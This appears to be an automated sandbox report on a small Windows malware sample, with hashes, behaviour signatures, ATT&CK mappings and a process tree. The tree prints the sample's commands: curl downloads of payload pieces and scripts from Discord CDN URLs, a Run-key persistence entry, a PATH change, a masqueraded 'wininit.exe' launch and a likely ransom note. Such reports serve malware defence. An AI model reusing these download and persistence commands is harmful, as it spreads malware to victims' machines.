f2535bd1ebe93ae17e34bbbd77705f7dc0f3e4c9717e89a63aa50628b05a0396

General

Target

5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe
Size

14KB
MD5

5273b4cbdbcac4aead01f7895ecef8f0
SHA1

4b9b4f7705d26e32827fcf6b4b1045453fcf4bff
SHA256

f2535bd1ebe93ae17e34bbbd77705f7dc0f3e4c9717e89a63aa50628b05a0396
SHA512

72fbee17fbd245e05e09b36d35a605bc4ae36483e6f2cb96670024a3eb627c200c7bee8f35f2645ea755c03f5de001a86319e5947fa1e06162ff9697bd5a864a
SSDEEP

192:FIzpdC3JYKFj9uyD8bjknN+542TnVabqCm0ME5B72L3W:FIzp+Fj95D8bjknN+eWnUbqCm0dNG3

Score

7^/10

persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\windowsinitalitiation = "%appdata%\\Microsoft\\CLR Security Config\\wininit.exe"	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings cmd.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1920 NOTEPAD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings	cmd.exe

pid	process
1920	NOTEPAD.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe

description	pid	process
Token: SeDebugPrivilege	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe
Token: SeDebugPrivilege	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe
Token: SeDebugPrivilege	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2136 wrote to memory of 3632	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 3632	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 3632	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 3004	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 3004	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 3004	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 684	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 684	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 684	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 736	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 736	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 736	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 2076	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 2076	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 2076	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 684 wrote to memory of 1864	684	cmd.exe	curl.exe
PID 684 wrote to memory of 1864	684	cmd.exe	curl.exe
PID 684 wrote to memory of 1864	684	cmd.exe	curl.exe
PID 2136 wrote to memory of 4604	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 4604	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 4604	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 736 wrote to memory of 5020	736	cmd.exe	curl.exe
PID 736 wrote to memory of 5020	736	cmd.exe	curl.exe
PID 736 wrote to memory of 5020	736	cmd.exe	curl.exe
PID 2076 wrote to memory of 3244	2076	cmd.exe	curl.exe
PID 2076 wrote to memory of 3244	2076	cmd.exe	curl.exe
PID 2076 wrote to memory of 3244	2076	cmd.exe	curl.exe
PID 3004 wrote to memory of 3260	3004	cmd.exe	curl.exe
PID 3004 wrote to memory of 3260	3004	cmd.exe	curl.exe
PID 3004 wrote to memory of 3260	3004	cmd.exe	curl.exe
PID 4604 wrote to memory of 3716	4604	cmd.exe	setx.exe
PID 4604 wrote to memory of 3716	4604	cmd.exe	setx.exe
PID 4604 wrote to memory of 3716	4604	cmd.exe	setx.exe
PID 2136 wrote to memory of 2200	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 2200	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 2200	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2200 wrote to memory of 4544	2200	cmd.exe	curl.exe
PID 2200 wrote to memory of 4544	2200	cmd.exe	curl.exe
PID 2200 wrote to memory of 4544	2200	cmd.exe	curl.exe
PID 2136 wrote to memory of 3464	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 3464	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 3464	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 3464 wrote to memory of 1856	3464	cmd.exe	curl.exe
PID 3464 wrote to memory of 1856	3464	cmd.exe	curl.exe
PID 3464 wrote to memory of 1856	3464	cmd.exe	curl.exe
PID 2136 wrote to memory of 3316	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 3316	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 3316	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 3316 wrote to memory of 5064	3316	cmd.exe	curl.exe
PID 3316 wrote to memory of 5064	3316	cmd.exe	curl.exe
PID 3316 wrote to memory of 5064	3316	cmd.exe	curl.exe
PID 2136 wrote to memory of 3172	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 3172	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 3172	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 3172 wrote to memory of 4068	3172	cmd.exe	curl.exe
PID 3172 wrote to memory of 4068	3172	cmd.exe	curl.exe
PID 3172 wrote to memory of 4068	3172	cmd.exe	curl.exe
PID 2136 wrote to memory of 976	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 976	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 976	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 4308	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 4308	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2136 wrote to memory of 4308	2136	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 4308 wrote to memory of 1920	4308	cmd.exe	NOTEPAD.EXE

C:\Users\Admin\AppData\Local\Temp\5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c md "%appdata%\Microsoft\CLR Security Config"
2⤵
PID:3632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679774034862190/part_0.bin -o "%appdata%\Microsoft\MS1.bin"
2⤵
- Suspicious use of WriteProcessMemory
PID:3004

C:\Windows\SysWOW64\curl.exe
curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679774034862190/part_0.bin -o "C:\Users\Admin\AppData\Roaming\Microsoft\MS1.bin"
3⤵
PID:3260

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693642463293500/protect.bat -o "%userprofile%\cmds\protect.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\SysWOW64\curl.exe
curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693642463293500/protect.bat -o "C:\Users\Admin\cmds\protect.bat"
3⤵
PID:1864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693642857545948/unprotect.bat -o "%userprofile%\cmds\protect.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:736

C:\Windows\SysWOW64\curl.exe
curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693642857545948/unprotect.bat -o "C:\Users\Admin\cmds\protect.bat"
3⤵
PID:5020

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693666526011402/ipuwu.py -o "%userprofile%\cmds\protect.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\SysWOW64\curl.exe
curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693666526011402/ipuwu.py -o "C:\Users\Admin\cmds\protect.bat"
3⤵
PID:3244

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c SETX /M Path "%PATH%;%userprofile%\cmds"
2⤵
- Suspicious use of WriteProcessMemory
PID:4604

C:\Windows\SysWOW64\setx.exe
SETX /M Path "C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;;C:\Users\Admin\cmds"
3⤵
PID:3716

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679790489129042/part_1.bin -o "%appdata%\Microsoft\MS2.bin"
2⤵
- Suspicious use of WriteProcessMemory
PID:2200

C:\Windows\SysWOW64\curl.exe
curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679790489129042/part_1.bin -o "C:\Users\Admin\AppData\Roaming\Microsoft\MS2.bin"
3⤵
PID:4544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679797472645170/part_2.bin -o "%appdata%\Microsoft\MS3.bin"
2⤵
- Suspicious use of WriteProcessMemory
PID:3464

C:\Windows\SysWOW64\curl.exe
curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679797472645170/part_2.bin -o "C:\Users\Admin\AppData\Roaming\Microsoft\MS3.bin"
3⤵
PID:1856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679801574662256/part_3.bin -o "%appdata%\Microsoft\MS4.bin"
2⤵
- Suspicious use of WriteProcessMemory
PID:3316

C:\Windows\SysWOW64\curl.exe
curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679801574662256/part_3.bin -o "C:\Users\Admin\AppData\Roaming\Microsoft\MS4.bin"
3⤵
PID:5064

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679696276672512/part_4.bin -o "%appdata%\Microsoft\MS5.bin"
2⤵
- Suspicious use of WriteProcessMemory
PID:3172

C:\Windows\SysWOW64\curl.exe
curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679696276672512/part_4.bin -o "C:\Users\Admin\AppData\Roaming\Microsoft\MS5.bin"
3⤵
PID:4068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "%appdata%\Microsoft\CLR Security Config\wininit.exe"
2⤵
PID:976

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start helpthis.txt
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4308

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\helpthis.txt
3⤵
- Opens file in notepad (likely ransom note)
PID:1920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\helpthis.txt

Filesize
510B

MD5
103ba63ca6e9e260b608f88fc563d6ca

SHA1
8029fe1d4f230d76ca7026e77fb7b7d5baad5c04

SHA256
85bc991923589cb7dbeb55a29652dc0bf9d1968a9297f5aa23ba77636bb69159

SHA512
adde9688399c12ac061e6fdc0432af9ebb59632b557aa8cb9926037f83f0849b2a4b61fdf2b28f24263bc58fdfd71f7ff69566e855830d47a56924ed4961f621

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\CLR Security Config\wininit.exe

Filesize
180B

MD5
51b65e6b57b25afd7da63b42f74f47f4

SHA1
15a10ba51db3d11e68cb326e9cb5f111bb846f34

SHA256
8031f6fd80f0e48c4f5159d6adbff2f5b8bf6394bae8b08ea9afb777fa7c4e04

SHA512
9d75081b3c149ad9a7d2456a45215785451ea861fce9b6c84eed8c8caf8d85f16f266c1773111b785a9cdfe7478603303215f75788e9f64faec9f715e9432fb9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\MS2.bin

Filesize
36B

MD5
a1ca4bebcd03fafbe2b06a46a694e29a

SHA1
ffc88125007c23ff6711147a12f9bba9c3d197ed

SHA256
c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

SHA512
6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

Download Submit
C:\Users\Admin\cmds\protect.bat

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2136-0-0x000000007454E000-0x000000007454F000-memory.dmp

Filesize
4KB

Download
memory/2136-1-0x0000000000DC0000-0x0000000000DCA000-memory.dmp

Filesize
40KB

Download
memory/2136-2-0x0000000005C50000-0x00000000061F4000-memory.dmp

Filesize
5.6MB

Download
memory/2136-3-0x00000000067A0000-0x0000000006832000-memory.dmp

Filesize
584KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads